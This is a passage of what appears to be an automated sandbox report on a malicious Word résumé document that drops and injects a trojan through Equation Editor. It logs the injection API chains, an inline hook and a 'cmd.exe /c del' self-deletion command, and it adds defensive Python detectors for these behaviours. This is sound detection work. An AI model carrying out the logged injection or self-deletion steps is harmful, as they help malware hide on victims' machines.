Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_009610D0 NtOpenProcessToken,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_00960060 NtQuerySection,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_009601D4 NtSetValueKey,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0096010C NtOpenDirectoryObject,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_00961148 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_009607AC NtCreateMutant,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095F8CC NtWaitForSingleObject,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_00961930 NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095F938 NtWriteFile,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FAB8 NtQueryValueKey,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FA20 NtQueryInformationFile,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FA50 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FBE8 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FB50 NtCreateKey,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FC30 NtOpenProcess,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_00960C40 NtGetContextThread,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FC48 NtSetInformationFile,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_00961D80 NtSuspendThread,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FD5C NtEnumerateKey,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FE24 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FFFC NtCreateProcessEx,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FF34 NtQueueApcThread,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0029A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0029A042 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025100C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025107AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250F900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250F9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02510048 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02510078 NtResumeThread,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02510060 NtQuerySection,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025110D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02511148 NtOpenThread,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0251010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025101D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FAD0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FAB8 NtQueryValueKey,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250F8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02511930 NtSetContextThread,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250F938 NtWriteFile,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FEA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02510C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250FD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02511D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012A360 NtCreateFile,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012A410 NtReadFile,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012A490 NtClose,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012A35A NtCreateFile,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012A40A NtReadFile,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012A48A NtClose,
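The entries above are mostly single-call wrappers around Native API functions that the sample resolves at runtime (the same set appears in seasonhd72463.exe and, after injection, in msiexec.exe). One entry, 5_2_0029A036, is a complete chain: NtQueryInformationProcess, RtlWow64SuspendThread, NtSetContextThread, NtQueueApcThread, NtResumeThread, NtClose, which is the suspend-thread, rewrite-context, queue-APC, resume pattern behind the "Queues an APC in another process" and "Modifies the context of a thread in another process" findings. The Python below is an added example and not part of the Joe Sandbox report: it matches call traces against ordered API-sequence signatures. The 0029A036 trace is transcribed from the listing, the second trace is built from the 0041A360..0041A490 file-read wrappers, the "hollowing" trace is constructed for contrast and was not observed in this sample, and the signature names are assumptions.

```python
"""Match Native API call traces against ordered injection signatures.
Added example for this report; signature names and the hollowing trace are constructed."""

# Call chains. The first is transcribed from 5_2_0029A036; the second is the benign
# file-read routine 5_2_0041A360..0041A490; the third is a constructed classic
# process-hollowing chain included for contrast (not observed in this sample).
TRACES = {
    "seasonhd72463.exe!0029A036": [
        "NtQueryInformationProcess", "RtlWow64SuspendThread", "NtSetContextThread",
        "NtQueueApcThread", "NtResumeThread", "NtClose",
    ],
    "seasonhd72463.exe!0041A360": ["NtCreateFile", "NtReadFile", "NtClose"],
    "constructed!hollowing": [
        "NtCreateProcessEx", "NtQueryInformationProcess", "NtUnmapViewOfSection",
        "NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtWriteVirtualMemory",
        "NtSetContextThread", "NtResumeThread",
    ],
}

# A signature is an ordered subsequence: unrelated calls may be interleaved between
# its elements, but the elements must occur in this relative order. Names are assumed.
SIGNATURES = {
    "thread_context_apc_injection": ["NtSetContextThread", "NtQueueApcThread", "NtResumeThread"],
    "process_hollowing": ["NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"],
    "section_mapping_injection": ["NtCreateSection", "NtMapViewOfSection", "NtResumeThread"],
}


def is_ordered_subsequence(pattern, calls):
    """True when every element of pattern occurs in calls in the same relative order."""
    remaining = iter(calls)  # a single pass: each wanted call consumes the trace up to its match
    return all(any(call == wanted for call in remaining) for wanted in pattern)


def matching_signatures(calls):
    """Names of every signature the given call chain satisfies."""
    return [name for name, pattern in SIGNATURES.items() if is_ordered_subsequence(pattern, calls)]


def scan(traces=TRACES):
    """Map function identifier -> matched signature names, omitting traces that match nothing."""
    hits = {}
    for func, calls in traces.items():
        matched = matching_signatures(calls)
        if matched:
            hits[func] = matched
    return hits


if __name__ == "__main__":
    for func, names in scan().items():
        print(func, "->", ", ".join(names))
```

Order matters: a trace that resumes the thread before queuing the APC does not match, which keeps benign suspend/resume routines out of the hit list. Real traces come from an API monitor or from the sandbox's per-function call listing; the individual wrappers above (NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread) show the capability is present in this sample even where the report does not record a single chained function that uses all of them.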
Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.dr | OLE indicator has summary info: false
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Memory allocated: 76E90000 page execute and read and write
Source: seasonzx[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: seasonhd72463.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C.V_Job Request.doc | Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Process created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Process created: C:\Users\user\AppData\Roaming\seasonhd72463.exe C:\Users\user\AppData\Roaming\seasonhd72463.exe
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'
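The process-creation records above give the whole delivery chain: Equation Editor (EQNEDT32.EXE, the host abused by CVE-2017-11882-style documents) launches a binary it wrote under AppData\Roaming, that binary relaunches its own image, explorer.exe starts an msiexec.exe with no installer arguments, and msiexec.exe finally removes the dropper through cmd.exe /c del. Each link is a relationship a detection rule can key on. The Python below is an added example, not part of the Joe Sandbox report: it encodes those four relationships as rules and runs them over event records constructed from the lines above. The ProcEvent record layout, the rule names and the user-writable path markers are assumptions.

```python
"""Flag suspicious parent/child process relationships in a process-creation log.
Added example for this report; the EVENTS list is constructed from the lines above."""
from dataclasses import dataclass
import ntpath


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # image path of the creating process ("unknown" when not observed)
    child: str     # image path of the created process
    cmdline: str   # command line of the created process


# Constructed from the "Process created" entries above.
EVENTS = [
    ProcEvent("unknown", r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r"'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding"),
    ProcEvent("unknown", r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              r"'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding"),
    ProcEvent(r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              r"C:\Users\user\AppData\Roaming\seasonhd72463.exe",
              r"C:\Users\user\AppData\Roaming\seasonhd72463.exe"),
    ProcEvent(r"C:\Users\user\AppData\Roaming\seasonhd72463.exe",
              r"C:\Users\user\AppData\Roaming\seasonhd72463.exe",
              r"C:\Users\user\AppData\Roaming\seasonhd72463.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\msiexec.exe",
              r"C:\Windows\SysWOW64\msiexec.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\msiexec.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'"),
]

OFFICE_HOSTS = {"eqnedt32.exe", "winword.exe", "excel.exe", "powerpnt.exe"}   # assumed set
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")              # assumed markers


def image(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def is_user_writable(text: str) -> bool:
    return any(marker in text.lower() for marker in USER_WRITABLE)


def classify(ev: ProcEvent) -> list:
    """Rule names the event matches; empty when nothing fires."""
    hits = []
    parent, child = image(ev.parent), image(ev.child)
    # Rule 1: an Office host or Equation Editor starting an executable from a
    # user-writable directory is the classic maldoc dropper shape.
    if parent in OFFICE_HOSTS and is_user_writable(ev.child):
        hits.append("office_host_spawns_userland_exe")
    # Rule 2: a process re-launching its own image from a user-writable path is a
    # common prelude to hollowing or injecting into the child.
    if ev.parent.lower() == ev.child.lower() and is_user_writable(ev.child):
        hits.append("self_respawn_from_userland")
    # Rule 3: explorer.exe launching msiexec.exe with no package argument; there is
    # no install happening, the binary is being used as a host for injected code.
    if parent == "explorer.exe" and child == "msiexec.exe" and "/i" not in ev.cmdline.lower():
        hits.append("explorer_spawns_argless_msiexec")
    # Rule 4: cmd.exe deleting a file under a user-writable path: dropper self-deletion.
    if child == "cmd.exe" and " del " in f" {ev.cmdline.lower()} " and is_user_writable(ev.cmdline):
        hits.append("cmd_deletes_userland_exe")
    return hits


def detect(events=EVENTS) -> list:
    """[(parent image, child image, matched rules)] for every event that fired at least one rule."""
    out = []
    for ev in events:
        rules = classify(ev)
        if rules:
            out.append((image(ev.parent), image(ev.child), rules))
    return out


if __name__ == "__main__":
    for parent, child, rules in detect():
        print(f"{parent} -> {child}: {', '.join(rules)}")
```

Rules 1 and 4 are path-based and survive a renamed dropper; rule 3 is the weakest on its own (legitimate msiexec.exe launches from explorer.exe exist) and is best scored together with the others within the same process tree rather than alerted on alone.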
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$V_Job Request.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRDECA.tmp
Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@9/10@2/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: seasonhd72463.exe, 00000004.00000000.412075091.0000000001102000.00000020.00020000.sdmp, seasonhd72463.exe, 00000005.00000000.420081661.0000000001102000.00000020.00020000.sdmp | Binary or memory string: insert into mediaitem (name, type, checked_to_patron_id, checkout_date, due_date) values (@name, @type, @patron_id, @co_date, @due_date);
Source: seasonhd72463.exe, 00000004.00000000.412075091.0000000001102000.00000020.00020000.sdmp, seasonhd72463.exe, 00000005.00000000.420081661.0000000001102000.00000020.00020000.sdmp | Binary or memory string: select id, name, type, checked_to_patron_id, checkout_date, due_date from mediaitem {0} order by name;where checked_to_patron_id = Mwhere checked_to_patron_id is not nullaselect id, name, type from patron where id = {0}_select id, name, type from patron order by nameWThe method or operation is not implemented.9Library.Properties.Resources
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C.V_Job Request.doc | Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.dr | OLE document summary: author field not present or empty
Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.dr | OLE document summary: edited time not present or 0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: msiexec.pdb source: seasonhd72463.exe, 00000005.00000002.461806357.0000000000380000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: seasonhd72463.exe, msiexec.exe
Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

.NET source code contains potential unpacker
Source: seasonzx[1].exe.2.dr, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: seasonhd72463.exe.2.dr, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.seasonhd72463.exe.1100000.2.unpack, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.seasonhd72463.exe.1100000.0.unpack, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.seasonhd72463.exe.1100000.6.unpack, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.seasonhd72463.exe.1100000.1.unpack, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.seasonhd72463.exe.1100000.0.unpack, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.seasonhd72463.exe.1100000.10.unpack, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.seasonhd72463.exe.1100000.5.unpack, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.seasonhd72463.exe.1100000.4.unpack, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.seasonhd72463.exe.1100000.2.unpack, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.seasonhd72463.exe.1100000.8.unpack, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.seasonhd72463.exe.1100000.3.unpack, Library/Form1.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_00417162 push ebp; ret
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0041D4B5 push eax; ret
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0041D56C push eax; ret
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0041D502 push eax; ret
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0041D50B push eax; ret
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_004165E8 push es; retf
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0041CE35 push edi; ret
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_004176DE push ebp; iretd
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0041768B push ebp; iretd
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0096DFA1 push ecx; ret
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0029E9B5 push esp; retn 0000h
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0029EB02 push esp; retn 0000h
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0029EB1E push esp; retn 0000h
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0251DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00127162 push ebp; ret
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012E3EF push esp; ret
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012D4B5 push eax; ret
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012D502 push eax; ret
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012D50B push eax; ret
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012D56C push eax; ret
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_001265E8 push es; retf
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012768B push ebp; iretd
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_001276DE push ebp; iretd
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012CE35 push edi; ret
Source: initial sample | Static PE information: section name: .text entropy: 7.54284746889
Source: initial sample | Static PE information: section name: .text entropy: 7.54284746889
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\seasonhd72463.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEB
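The line above records that the first bytes of USER32!PeekMessageA, as mapped in explorer.exe, no longer match the DLL image: the sample has overwritten the function prolog so that every message-loop call passes through its own code. The Python below is an added example, not part of the report, of the check an analyst performs to confirm and classify such a hook: read the prolog bytes from the process, read the same bytes from the DLL on disk (or from a clean process), and decode whatever trampoline replaced them. The exports, addresses and prolog bytes it uses are constructed; they are not PeekMessageA's real bytes, and the "jmp rel32" target calculation assumes the function address passed in is the one the bytes were read from.

```python
"""Classify an inline hook from a function's prolog bytes.
Added example for this report; all prologs and addresses below are constructed."""
import struct


def classify_prolog(func_addr: int, on_disk: bytes, in_memory: bytes):
    """None when the mapped prolog still matches the on-disk image, else (kind, target).
    target is the trampoline destination where the encoding lets it be computed, else None."""
    if in_memory[:len(on_disk)] == on_disk:
        return None
    b = in_memory
    if b[0] == 0xE9 and len(b) >= 5:                                        # jmp rel32
        disp = struct.unpack_from("<i", b, 1)[0]                             # signed displacement
        return ("jmp rel32", func_addr + 5 + disp)                           # relative to next instruction
    if b[:2] == b"\xFF\x25" and len(b) >= 6:                                 # jmp [rip+disp32] / jmp [abs32]
        return ("jmp indirect", None)                                        # needs a memory read to resolve
    if b[0] == 0x68 and len(b) >= 6 and b[5] == 0xC3:                        # push imm32; ret
        return ("push/ret", struct.unpack_from("<I", b, 1)[0])
    if b[:2] == b"\x48\xB8" and len(b) >= 12 and b[10:12] == b"\xFF\xE0":    # mov rax, imm64; jmp rax
        return ("mov rax/jmp rax", struct.unpack_from("<Q", b, 2)[0])
    return ("modified, unclassified", None)


def find_hooks(func_addrs: dict, disk_prologs: dict, memory_prologs: dict) -> dict:
    """Compare every export's prolog; return {name: classification} for the ones that changed."""
    hooks = {}
    for name, clean in disk_prologs.items():
        verdict = classify_prolog(func_addrs[name], clean, memory_prologs[name])
        if verdict is not None:
            hooks[name] = verdict
    return hooks


# Constructed scenario (not the report's data): three USER32 exports, one redirected with a
# rel32 jump into a private region 64 KiB away, one rewritten with push/ret, one left intact.
ADDRS = {"PeekMessageA": 0x7FFB1A2B3000, "GetMessageA": 0x7FFB1A2B4000, "DispatchMessageA": 0x7FFB1A2B5000}
DISK = {name: b"\x48\x89\x5C\x24\x08\x57" for name in ADDRS}   # assumed clean x64 prolog bytes
MEMORY = {
    "PeekMessageA": b"\xE9" + struct.pack("<i", 0x00010000) + b"\x57",
    "GetMessageA": b"\x68" + struct.pack("<I", 0x00401000) + b"\xC3",
    "DispatchMessageA": DISK["DispatchMessageA"],
}

if __name__ == "__main__":
    for name, (kind, target) in find_hooks(ADDRS, DISK, MEMORY).items():
        print(f"{name}: {kind}" + (f" -> {target:#x}" if target is not None else ""))
```

Two caveats when running this against a live process: the on-disk bytes must come from the same DLL build the process loaded (otherwise every export looks hooked), and a prolog that differs without matching a known trampoline shape, like the six bytes the report prints for PeekMessageA, still needs disassembly from the function address to see where control actually goes.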
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
